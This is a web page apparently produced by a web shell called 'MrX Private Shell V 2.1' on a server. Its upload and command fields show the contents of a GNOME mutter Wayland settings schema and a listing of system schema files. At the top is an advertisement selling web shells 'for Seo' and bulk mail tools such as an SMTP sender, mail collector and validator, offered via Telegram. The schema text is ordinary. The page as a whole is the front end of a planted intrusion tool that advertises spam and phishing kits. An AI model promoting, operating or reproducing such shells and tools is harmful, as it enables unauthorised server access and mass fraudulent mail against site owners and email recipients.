__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<schemalist>

  <flags id="org.gnome.mutter.MetaXwaylandDisableExtension">
    <value nick="Security" value="1"/>
    <value nick="Xtest" value="2"/>
  </flags>

  <schema id="org.gnome.mutter.wayland.keybindings" path="/org/gnome/mutter/wayland/keybindings/"
	  gettext-domain="mutter">
    <key name="switch-to-session-1" type="as">
      <default><![CDATA[['<Primary><Alt>F1']]]></default>
      <summary>Switch to VT 1</summary>
    </key>
    <key name="switch-to-session-2" type="as">
      <default><![CDATA[['<Primary><Alt>F2']]]></default>
      <summary>Switch to VT 2</summary>
    </key>
    <key name="switch-to-session-3" type="as">
      <default><![CDATA[['<Primary><Alt>F3']]]></default>
      <summary>Switch to VT 3</summary>
    </key>
    <key name="switch-to-session-4" type="as">
      <default><![CDATA[['<Primary><Alt>F4']]]></default>
      <summary>Switch to VT 4</summary>
    </key>
    <key name="switch-to-session-5" type="as">
      <default><![CDATA[['<Primary><Alt>F5']]]></default>
      <summary>Switch to VT 5</summary>
    </key>
    <key name="switch-to-session-6" type="as">
      <default><![CDATA[['<Primary><Alt>F6']]]></default>
      <summary>Switch to VT 6</summary>
    </key>
    <key name="switch-to-session-7" type="as">
      <default><![CDATA[['<Primary><Alt>F7']]]></default>
      <summary>Switch to VT 7</summary>
    </key>
    <key name="switch-to-session-8" type="as">
      <default><![CDATA[['<Primary><Alt>F8']]]></default>
      <summary>Switch to VT 8</summary>
    </key>
    <key name="switch-to-session-9" type="as">
      <default><![CDATA[['<Primary><Alt>F9']]]></default>
      <summary>Switch to VT 9</summary>
    </key>
    <key name="switch-to-session-10" type="as">
      <default><![CDATA[['<Primary><Alt>F10']]]></default>
      <summary>Switch to VT 10</summary>
    </key>
    <key name="switch-to-session-11" type="as">
      <default><![CDATA[['<Primary><Alt>F11']]]></default>
      <summary>Switch to VT 11</summary>
    </key>
    <key name="switch-to-session-12" type="as">
      <default><![CDATA[['<Primary><Alt>F12']]]></default>
      <summary>Switch to VT 12</summary>
    </key>
    <key name="restore-shortcuts" type="as">
      <default><![CDATA[['<Super>Escape']]]></default>
      <summary>Re-enable shortcuts</summary>
    </key>
  </schema>


  <schema id="org.gnome.mutter.wayland" path="/org/gnome/mutter/wayland/"
          gettext-domain="mutter">

    <key name="xwayland-allow-grabs" type="b">
      <default>false</default>
      <summary>Allow X11 grabs to lock keyboard focus with Xwayland</summary>
      <description>
        Allow all keyboard events to be routed to X11 “override redirect”
        windows with a grab when running in Xwayland.

        This option is to support X11 clients which map an “override redirect”
        window (which do not receive keyboard focus) and issue a keyboard
        grab to force all keyboard events to that window.

        This option is seldom used and has no effect on regular X11 windows
        which can receive keyboard focus under normal circumstances.

        For a X11 grab to be taken into account under Wayland, the client must
        also either send a specific X11 ClientMessage to the root window or be
        among the applications allowed in key “xwayland-grab-access-rules”.
      </description>
    </key>

    <key name="xwayland-grab-access-rules" type="as">
      <default>[]</default>
      <summary>Xwayland applications allowed to issue keyboard grabs</summary>
      <description>
        List the resource names or resource class of X11 windows either
        allowed or not allowed to issue X11 keyboard grabs under Xwayland.

        The resource name or resource class of a given X11 window can be
        obtained using the command “xprop WM_CLASS”.

        Wildcards “*” and jokers “?” in the values are supported.

        Values starting with “!” are denied, which has precedence over
        the list of values allowed, to revoke applications from the default
	system list.

        The default system list includes the following applications:

        “gnome-boxes,remote-viewer,virt-viewer,virt-manager,vinagre,vncviewer,Xephyr”

        Users can break an existing grab by using the specific keyboard
        shortcut defined by the keybinding key “restore-shortcuts”.
      </description>
    </key>

    <key name="xwayland-disable-extension"
        flags='org.gnome.mutter.MetaXwaylandDisableExtension'>
      <default>[]</default>
      <summary>Disable selected X extensions in Xwayland</summary>
      <description>
        This option disables the selected X extensions in Xwayland if
        Xwayland was built with support for those X extensions.

        This option has no effect if Xwayland was built without support
        for the selected extensions.

        Xwayland needs to be restarted for this setting to take effect.
      </description>
    </key>

    <key name="xwayland-allow-byte-swapped-clients" type="b">
      <default>false</default>
      <summary>Allow X11 clients with a different endianness to connect to Xwayland</summary>
      <description>
        Allow connections from clients with an endianness different to that
	of Xwayland.

	The X server byte-swapping code is a huge attack surface, much of
	that code in Xwayland is prone to security issues.

	The use-case of byte-swapped clients is very niche, and disabled by
	default in Xwayland.

	Enable this option to instruct Xwayland to accept connections from
	X11 clients with a different endianness.

        This option has no effect if Xwayland does not support the command
	line option +byteswappedclients/-byteswappedclients to control that
	setting.

        Xwayland needs to be restarted for this setting to take effect.
      </description>
    </key>

    <child name="keybindings" schema="org.gnome.mutter.wayland.keybindings"/>
  </schema>

</schemalist>

Filemanager

Name Type Size Permission Actions
00_org.gnome.shell.gschema.override File 158 B 0644
10_gnome-shell.gschema.override File 216 B 0644
10_gnome-terminal.gschema.override File 56 B 0644
10_gsettings-desktop-schemas.gschema.override File 467 B 0644
10_ubuntu-dock.gschema.override File 480 B 0644
10_ubuntu-settings.gschema.override File 7.11 KB 0644
20_ubuntu-desktop-installer-wm.gschema.override File 76 B 0644
com.canonical.Unity.Lenses.gschema.xml File 2.45 KB 0644
com.canonical.unity.desktop.gschema.xml File 3.1 KB 0644
com.ubuntu.SoftwareProperties.gschema.xml File 420 B 0644
com.ubuntu.login-screen.gschema.xml File 3.16 KB 0644
com.ubuntu.notifications.hub.gschema.xml File 703 B 0644
com.ubuntu.notifications.settings.gschema.xml File 2.17 KB 0644
com.ubuntu.phone.gschema.xml File 1 KB 0644
com.ubuntu.sound.gschema.xml File 367 B 0644
com.ubuntu.touch.network.gschema.xml File 663 B 0644
com.ubuntu.touch.sound.gschema.xml File 1006 B 0644
com.ubuntu.touch.system.gschema.xml File 2.38 KB 0644
com.ubuntu.update-manager.gschema.xml File 2.99 KB 0644
com.ubuntu.update-notifier.gschema.xml File 2.5 KB 0644
com.ubuntu.user-interface.gschema.xml File 2.04 KB 0644
gschemas.compiled File 211.67 KB 0644
org.freedesktop.ColorHelper.gschema.xml File 1.13 KB 0644
org.freedesktop.Tracker3.Extract.gschema.xml File 1.85 KB 0644
org.freedesktop.Tracker3.FTS.gschema.xml File 1.65 KB 0644
org.freedesktop.Tracker3.Miner.Files.gschema.xml File 6.12 KB 0644
org.freedesktop.TrackerMiners3.enums.xml File 619 B 0644
org.freedesktop.ibus.engine.table.gschema.xml File 5.33 KB 0644
org.freedesktop.ibus.gschema.xml File 15.99 KB 0644
org.freedesktop.pulseaudio.gschema.xml File 2.99 KB 0644
org.gnome.Characters.gschema.xml File 367 B 0644
org.gnome.DejaDup.gschema.xml File 9.15 KB 0644
org.gnome.Disks.gschema.xml File 1.23 KB 0644
org.gnome.Evolution.DefaultSources.gschema.xml File 1.03 KB 0644
org.gnome.Extensions.gschema.xml File 509 B 0644
org.gnome.FileRoller.gschema.xml File 9.05 KB 0644
org.gnome.GWeather4.enums.xml File 1.49 KB 0644
org.gnome.GWeather4.gschema.xml File 2.73 KB 0644
org.gnome.Logs.enums.xml File 420 B 0644
org.gnome.Logs.gschema.xml File 746 B 0644
org.gnome.Papers.gschema.xml File 3.16 KB 0644
org.gnome.SessionManager.gschema.xml File 1.14 KB 0644
org.gnome.Settings.gschema.xml File 1.04 KB 0644
org.gnome.SimpleScan.gschema.xml File 4.42 KB 0644
org.gnome.Snapshot.gschema.xml File 2.71 KB 0644
org.gnome.Terminal.gschema.xml File 31.36 KB 0644
org.gnome.TextEditor.gschema.xml File 6.58 KB 0644
org.gnome.baobab.gschema.xml File 1.28 KB 0644
org.gnome.calculator.gschema.xml File 4.43 KB 0644
org.gnome.calendar.enums.xml File 1.04 KB 0644
org.gnome.calendar.gschema.xml File 1.27 KB 0644
org.gnome.clocks.gschema.xml File 1.94 KB 0644
org.gnome.crypto.cache.gschema.xml File 778 B 0644
org.gnome.crypto.pgp.gschema.xml File 1.62 KB 0644
org.gnome.desktop.a11y.applications.gschema.xml File 845 B 0644
org.gnome.desktop.a11y.gschema.xml File 828 B 0644
org.gnome.desktop.a11y.interface.gschema.xml File 676 B 0644
org.gnome.desktop.a11y.keyboard.gschema.xml File 4.78 KB 0644
org.gnome.desktop.a11y.magnifier.gschema.xml File 9.16 KB 0644
org.gnome.desktop.a11y.mouse.gschema.xml File 2.84 KB 0644
org.gnome.desktop.app-folders.gschema.xml File 1.8 KB 0644
org.gnome.desktop.background.gschema.xml File 2.55 KB 0644
org.gnome.desktop.break-reminders.gschema.xml File 5.62 KB 0644
org.gnome.desktop.calendar.gschema.xml File 427 B 0644
org.gnome.desktop.datetime.gschema.xml File 439 B 0644
org.gnome.desktop.default-applications.gschema.xml File 3.02 KB 0644
org.gnome.desktop.enums.xml File 7.23 KB 0644
org.gnome.desktop.input-sources.gschema.xml File 2.77 KB 0644
org.gnome.desktop.interface.gschema.xml File 13.25 KB 0644
org.gnome.desktop.lockdown.gschema.xml File 3.38 KB 0644
org.gnome.desktop.media-handling.gschema.xml File 2.54 KB 0644
org.gnome.desktop.notifications.gschema.xml File 2.77 KB 0644
org.gnome.desktop.peripherals.gschema.xml File 16.94 KB 0644
org.gnome.desktop.privacy.gschema.xml File 4.79 KB 0644
org.gnome.desktop.remote-desktop.enums.xml File 980 B 0644
org.gnome.desktop.remote-desktop.gschema.xml File 6.43 KB 0644
org.gnome.desktop.screen-time-limits.gschema.xml File 1.35 KB 0644
org.gnome.desktop.screensaver.gschema.xml File 6.05 KB 0644
org.gnome.desktop.search-providers.gschema.xml File 1.86 KB 0644
org.gnome.desktop.session.gschema.xml File 668 B 0644
org.gnome.desktop.sound.gschema.xml File 1.03 KB 0644
org.gnome.desktop.thumbnail-cache.gschema.xml File 600 B 0644
org.gnome.desktop.thumbnailers.gschema.xml File 866 B 0644
org.gnome.desktop.wm.keybindings.gschema.xml File 13.19 KB 0644
org.gnome.desktop.wm.preferences.gschema.xml File 12.1 KB 0644
org.gnome.eog.enums.xml File 1.54 KB 0644
org.gnome.eog.gschema.xml File 6.53 KB 0644
org.gnome.evolution-data-server.addressbook.gschema.xml File 320 B 0644
org.gnome.evolution-data-server.calendar.gschema.xml File 5.52 KB 0644
org.gnome.evolution-data-server.gschema.xml File 6.7 KB 0644
org.gnome.evolution.eds-shell.gschema.xml File 684 B 0644
org.gnome.evolution.shell.network-config.gschema.xml File 5.27 KB 0644
org.gnome.gnome-system-monitor.enums.xml File 423 B 0644
org.gnome.gnome-system-monitor.gschema.xml File 19.48 KB 0644
org.gnome.login-screen.gschema.xml File 4.02 KB 0644
org.gnome.mousetweaks.enums.xml File 852 B 0644
org.gnome.mousetweaks.gschema.xml File 958 B 0644
org.gnome.mutter.gschema.xml File 8.62 KB 0644
org.gnome.mutter.wayland.gschema.xml File 5.85 KB 0644
org.gnome.mutter.x11.gschema.xml File 1.09 KB 0644
org.gnome.nautilus.gschema.xml File 13.96 KB 0644
org.gnome.nm-applet.eap.gschema.xml File 650 B 0644
org.gnome.online-accounts.gschema.xml File 709 B 0644
org.gnome.power-manager.gschema.xml File 2.41 KB 0644
org.gnome.rhythmbox.gschema.xml File 19.74 KB 0644
org.gnome.rhythmbox.plugins.alternative_toolbar.gschema.xml File 3.96 KB 0644
org.gnome.seahorse.gschema.xml File 1.23 KB 0644
org.gnome.seahorse.manager.gschema.xml File 2.04 KB 0644
org.gnome.seahorse.window.gschema.xml File 446 B 0644
org.gnome.settings-daemon.enums.xml File 2.93 KB 0644
org.gnome.settings-daemon.global-shortcuts.gschema.xml File 729 B 0644
org.gnome.settings-daemon.peripherals.gschema.xml File 7.25 KB 0644
org.gnome.settings-daemon.peripherals.wacom.gschema.xml File 4.74 KB 0644
org.gnome.settings-daemon.plugins.color.gschema.xml File 2.48 KB 0644
org.gnome.settings-daemon.plugins.gschema.xml File 966 B 0644
org.gnome.settings-daemon.plugins.housekeeping.gschema.xml File 1.68 KB 0644
org.gnome.settings-daemon.plugins.media-keys.gschema.xml File 28.74 KB 0644
org.gnome.settings-daemon.plugins.power.gschema.xml File 4.32 KB 0644
org.gnome.settings-daemon.plugins.sharing.gschema.xml File 493 B 0644
org.gnome.settings-daemon.plugins.wwan.gschema.xml File 407 B 0644
org.gnome.settings-daemon.plugins.xsettings.gschema.xml File 3.02 KB 0644
org.gnome.shell.extensions.appindicator.gschema.xml File 1.7 KB 0644
org.gnome.shell.extensions.dash-to-dock.gschema.xml File 28.53 KB 0644
org.gnome.shell.extensions.ding.gschema.xml File 5.04 KB 0644
org.gnome.shell.extensions.tiling-assistant.gschema.xml File 8.01 KB 0644
org.gnome.shell.gschema.xml File 15.35 KB 0644
org.gnome.shell.ubuntu.gschema.xml File 948 B 0644
org.gnome.shotwell-extras.gschema.xml File 1.33 KB 0644
org.gnome.shotwell.gschema.xml File 32.22 KB 0644
org.gnome.system.dns_sd.gschema.xml File 766 B 0644
org.gnome.system.gvfs.enums.xml File 469 B 0644
org.gnome.system.locale.gschema.xml File 448 B 0644
org.gnome.system.location.gschema.xml File 1.13 KB 0644
org.gnome.system.proxy.gschema.xml File 6.21 KB 0644
org.gnome.system.smb.gschema.xml File 786 B 0644
org.gnome.system.wsdd.gschema.xml File 473 B 0644
org.gnome.totem.enums.xml File 5.92 KB 0644
org.gnome.totem.gschema.xml File 3.69 KB 0644
org.gnome.totem.plugins.opensubtitles.gschema.xml File 381 B 0644
org.gnome.totem.plugins.pythonconsole.gschema.xml File 481 B 0644
org.gnome.yelp.gschema.xml File 792 B 0644
org.gtk.Settings.ColorChooser.gschema.xml File 931 B 0644
org.gtk.Settings.Debug.gschema.xml File 833 B 0644
org.gtk.Settings.EmojiChooser.gschema.xml File 623 B 0644
org.gtk.Settings.FileChooser.gschema.xml File 6.07 KB 0644
org.gtk.gtk4.Inspector.gschema.xml File 1.21 KB 0644
org.gtk.gtk4.Settings.ColorChooser.gschema.xml File 941 B 0644
org.gtk.gtk4.Settings.Debug.gschema.xml File 840 B 0644
org.gtk.gtk4.Settings.EmojiChooser.gschema.xml File 678 B 0644
org.gtk.gtk4.Settings.FileChooser.gschema.xml File 6.38 KB 0644
org.yorba.shotwell-extras.gschema.xml File 3.37 KB 0644
org.yorba.shotwell.gschema.xml File 34.1 KB 0644
xdg-desktop-portal-gnome.gschema.xml File 391 B 0644
Filemanager